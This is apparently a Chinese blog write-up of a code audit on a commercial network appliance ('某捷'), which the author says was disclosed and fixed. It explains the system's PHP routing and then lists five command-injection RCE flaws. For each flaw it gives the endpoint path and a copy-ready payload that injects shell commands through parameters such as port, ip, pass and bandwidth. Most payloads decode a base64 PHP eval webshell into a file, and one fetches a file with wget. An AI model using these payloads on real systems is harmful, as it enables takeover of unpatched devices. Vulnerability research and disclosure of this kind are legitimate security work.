记录某捷的代码审计(附5个rce0day)

前言:漏洞均已提交且均已修复
这里文章只做技术交流

关于这个系统
算是自己反反复复审了2-3次的系统 审了大概 7-8个后台的rce吧 还有一些其他思路getshell的洞 以及一些单独的洞 如任意文件读取 和前台的文件包含的洞

这里只放出RCE的洞了 先放出5个吧 还有3个没修完

审计过程:

①分析对应路由关系

分析路由过程其实蛮简单的 这里就浅显的提供下思路 不喜欢把简单的东西复杂化 写一篇看似很酷的技术文

一般情况两种思路
思路1
纯白盒去构造
如该系统的
即分析到该系统文件的路由构造php文件
一般来说是index.php里面去找看他加载了什么文件然后再去该文件里寻找路由关系

这个的放在init.php里面的
即看源码可知 a控制的action c控制的是controller
先判断是否存在这个php文件
然后action即这个php文件中是否存在对应的函数方法
在这里插入图片描述
因此完整的就可以调用分析了 即如index.php?a=方法名即可

思路2
白盒加黑盒去构造路由分析(个人比较喜欢这种,主要是更快)
黑盒登录一个系统 看看其源码构造是什么样子的 跟着构造一个即可
如打开网页后登录后如果是这种
login.php?a=serial
即去看看login.php里面是否存在这个serial方法即可

存在即说明直接就是php文件后跟a控制方法

同理哪怕是mvc框架的也是一样的思路

②漏洞点分析

RCE漏洞1
漏洞原理:
输入的port参数即赋值给name的参数直接进行赋值拼接到command中后直接进行exec执行
导致rce

因此可以构造执行生成马
典型的两类思路
①直接利用echo写马生成
②利用wget命令进行写马 (当然啦直接反弹shell也行 不过个人不是很喜欢用这种)

自己习惯的话 就是能写echo直接写马的就不用wget命令思路
| wget http://127.0.0.1/cs.txt -O a1.php
参数拼接上面的就可以了

port=80|echo “PD9waHAgQGV2YWwoJF9QT1NUWzFdKTs/Pg==”|base64 -d >test1.php
即利用echo命令直接写一个马到test1.php中

在这里插入图片描述

即直接生成了一个test1.php
进行连接即可上线
在这里插入图片描述
RCE漏洞2
原理:和上面的一个漏洞的差不多 不过这个做了一个限制 就是mac必须匹配6个以上
在这里插入图片描述

因此可以利用的payload

post包如下

guest_auth/cfg/dbopr.php?a=index

type=deleteGuest&mac=fe1::3831:79114:c31c9:6319e%21&ip=127.0.0.1| echo "PD9waHAgQGV2YWwoJF9QT1NUWzFdKTs/Pg=="|base64 -d > test1.php;

在这里插入图片描述
同理直接可生成一个test1.php的木马

RCE漏洞3
在这里插入图片描述
原理也是一样的 这里的evpnshell就是一个exec执行的命令 只是单独写到了一个函数里面了

payload

itbox_pi/branch_passw.php?a=set

pass=127.0.0.1| echo "PD9waHAgQGV2YWwoJF9QT1NUWzFdKTs/Pg=="|base64 -d > test1.php;

RCE漏洞4
在这里插入图片描述
漏洞原理:和上面的一样
这里获取bandwidth然后直接进行拼接执行
因此这里可以利用该payload直接执行

itbox_pi/networksafe.php?a=set

bandwidth=127.0.0.1| echo "PD9waHAgQGV2YWwoJF9QT1NUWzFdKTs/Pg=="|base64 -d > test2.php;

RCE漏洞5
在这里插入图片描述

在这里插入图片描述

原理:
和上面的差不多command是直接拼接的
然后后面直接进行执行的
因此这里可以利用该payload直接执行

/itbox_pi/vpn_quickset_service.php?a=set_vpn

ip=127.0.0.1|ls > test11.txt;

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

goddemon

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值